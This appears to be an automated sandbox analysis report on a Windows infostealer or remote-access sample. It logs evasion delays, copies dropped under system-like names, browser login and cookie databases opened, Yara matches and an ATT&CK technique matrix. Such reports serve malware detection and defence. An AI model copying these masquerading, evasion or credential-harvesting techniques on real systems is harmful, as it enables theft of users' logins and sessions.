Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe TID: 7268 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe TID: 3192 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe TID: 736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe TID: 2112 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe TID: 5808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe TID: 7988 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C17D7088 GetSystemInfo,17_2_00007FF7C17D7088
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 599871Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 599025Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598891Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598688Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598562Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598438Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598313Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598199Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598088Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597782Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597516Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597227Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597101Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596983Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596780Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596672Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596547Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596436Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596327Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596213Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596109Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595879Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595750Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595641Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595516Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595391Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595269Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595141Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595031Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594922Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594804Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594688Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594554Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594342Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594234Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594125Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594016Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593891Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593771Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593641Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593516Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593406Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593238Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593100Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592928Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592797Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592672Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592552Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592422Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592307Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592181Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591946Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591827Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591700Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591563Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591438Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591328Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591219Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591089Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\userJump to behavior
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                              Source: vbwUCvifDl.17.drBinary or memory string: tasks.office.comVMware20,11696501413o
                              Source: vbwUCvifDl.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                              Source: vbwUCvifDl.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                              Source: vbwUCvifDl.17.drBinary or memory string: dev.azure.comVMware20,11696501413j
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                              Source: upfc.exe, 00000011.00000002.2529956937.000000001B810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
                              Source: vbwUCvifDl.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                              Source: vbwUCvifDl.17.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                              Source: vbwUCvifDl.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                              Source: vbwUCvifDl.17.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                              Source: w32tm.exe, 00000025.00000002.1348768442.00000193F56B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                              Source: vbwUCvifDl.17.drBinary or memory string: outlook.office.comVMware20,11696501413s
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, upfc.exe.0.dr, llflCdrMcgGB.exe.0.dr, llflCdrMcgGB.exe0.0.dr, StartMenuExperienceHost.exe.0.dr, upfc.exe0.0.drBinary or memory string: Py2SvhiHGfsrxCC8JlZ5
                              Source: vbwUCvifDl.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                              Source: vbwUCvifDl.17.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                              Source: vbwUCvifDl.17.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                              Source: vbwUCvifDl.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                              Source: vbwUCvifDl.17.drBinary or memory string: global block list test formVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                              Source: vbwUCvifDl.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                              Source: vbwUCvifDl.17.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1311821217.000000001B853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: vbwUCvifDl.17.drBinary or memory string: discord.comVMware20,11696501413f
                              Source: vbwUCvifDl.17.drBinary or memory string: AMC password management pageVMware20,11696501413
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess token adjusted: Debug
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess token adjusted: Debug
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess token adjusted: Debug
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD41E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD631.tmp" "c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP"Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: upfc.exe, 00000011.00000002.2485222023.0000000003348000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeQueries volume information: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\upfc.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\upfc.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeQueries volume information: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe VolumeInformation
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeQueries volume information: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe VolumeInformation
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe VolumeInformation
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe VolumeInformation
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information

                              Source: Yara matchFile source: 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1308539663.0000000012A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe PID: 7704, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 6960, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 6764, type: MEMORYSTR
                              Source: Yara matchFile source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.3b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1240706650.00000000003B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\llflCdrMcgGB.exe, type: DROPPED
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-wal
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                              Remote Access Functionality

Source: Yara match; File source: 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1308539663.0000000012A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe PID: 7704, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: upfc.exe PID: 6960, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: upfc.exe PID: 6764, type: MEMORYSTR
Source: Yara match; File source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, type: SAMPLE
Source: Yara match; File source: 0.0.62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.1240706650.00000000003B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
Source: Yara match; File source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match; File source: C:\Recovery\llflCdrMcgGB.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 115 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | Security Account Manager | 21 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 411 Registry Run Keys / Startup Folder | 411 Registry Run Keys / Startup Folder | 12 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 133 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
